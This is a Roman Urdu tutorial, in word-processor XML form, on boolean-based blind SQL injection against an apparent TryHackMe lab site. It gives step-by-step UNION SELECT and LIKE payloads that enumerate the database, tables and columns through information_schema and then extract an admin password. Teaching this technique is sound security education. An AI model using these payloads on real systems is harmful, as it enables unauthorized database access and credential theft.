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  <w:t>Boolean-Based Blind SQL Injection – Complete Explanation (Roman Urdu)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1. Boolean-Based SQL Injection Kya Hoti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Boolean-based SQL Injection, Blind SQLi ka ek type hai.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Simple Samajh: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Isme hume sirf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2 type ke responses milte hain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TRUE / FALSE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YES / NO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1 / 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ON / OFF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Important Idea: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Sirf in 2 responses se hum poora database nikaal sakte hain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2. Real Scenario (API Example)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URL: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https://website.thm/checkuser?username=admin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Response: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{"taken":true}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Samajh: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taken: true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→ username already exist karta hai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taken: false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→ username available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3. Backend Query Samajh Lo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select * from users where username = '%username%' LIMIT 1;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Meaning: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 check karta hai:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockQuotation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“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Kya ye username exist karta hai?”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4. Attack Ka Goal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Hume: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direct data nahi milega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sirf TRUE/FALSE milega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To hum:</w:t>
        <w:br/>
        <w:t>→ guess karenge step by step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5. Step 1: Columns Count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Payload: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1;--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Response:</w:t>
        <w:br/>
        <w:t>→ FALSE (wrong columns)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Phir try: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1,2,3;--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Response:</w:t>
        <w:br/>
        <w:t>→ TRUE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Conclusion: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Table me 3 columns hain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6. Step 2: Database Name Guess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Payload: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admin123' UNION SELECT 1,2,3 where database() like '%';--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TRUE (kyunki % sab match karta hai)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Ab Guessing Start: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database() like 'a%'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FALSE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database() like 's%'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TRUE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Samajh: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Database name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 se start hota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Next Step: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Try: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sa%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sb%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sc%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Aur aise aage badhte jao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Final Result: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sqli_three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7. Step 3: Tables Find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Payload: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1,2,3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FROM information_schema.tables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WHERE table_schema = 'sqli_three'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and table_name like 'a%';--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Process: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a%, b%, c% try karo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jab TRUE aaye → match mil gaya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Final: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users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8. Step 4: Columns Find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Payload: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1,2,3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FROM information_schema.COLUMNS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WHERE TABLE_SCHEMA='sqli_three'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and TABLE_NAME='users'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and COLUMN_NAME like 'a%';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Process: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har letter try karo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jab TRUE aaye → column mil gaya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Duplicate Avoid Karna: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and COLUMN_NAME !='id'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Final Columns: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username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password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9. Step 5: Username Find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Payload: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1,2,3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from users where username like 'a%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Process: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a%, b%, c% try karo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phir agla character guess karo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Final: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admin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10. Step 6: Password Find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Payload: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1,2,3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from users where username='admin'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and password like 'a%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Process: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a%, b%, c%... try karo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phir next character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Final Password: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3845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11. Complete Attack Flow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count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 name guess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Tables find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find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Username find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Password find karo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12. Important Concepts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1. LIKE Operator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%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→ wildcard (kuch bhi ho sakta hai)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2. information_schema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 ka hidden map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3. Boolean Logic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TRUE / FALSE se kaam hota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13. Students Yahan Phas Jate Hain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patience nahi rakhte (ye slow process hai)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har character try nahi karte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duplicate results avoid nahi karte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syntax galat likh dete hain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14. Real Life Samajh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Socho tum password guess kar rahe ho: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"kya password '3' se start hota hai?"</w:t>
        <w:br/>
        <w:t>→ TRUE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"kya '38' se start hota hai?"</w:t>
        <w:br/>
        <w:t>→ TRUE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"kya '384' se start hota hai?"</w:t>
        <w:br/>
        <w:t>→ TRUE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Aise hi full password mil jata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15. Final Summary (Short)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Boolean-Based SQL Injection me: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sirf TRUE/FALSE response milta hai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direct data nahi milta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Technique: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guessing + LIKE operator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step by step characters find karte hain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Flow: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→ database → tables → columns → data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Example result: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DB: sqli_three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Table: users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Username: admin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Password: 3845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tum chaho to main next level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Time-Based Blind SQL Injection (delay wali technique)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bhi isi tarah Roman Urdu me detail me sikha sakta hoon.</w:t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LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>9</Pages>
  <Words>607</Words>
  <Characters>2938</Characters>
  <CharactersWithSpaces>3367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2026-04-06T21:58:40Z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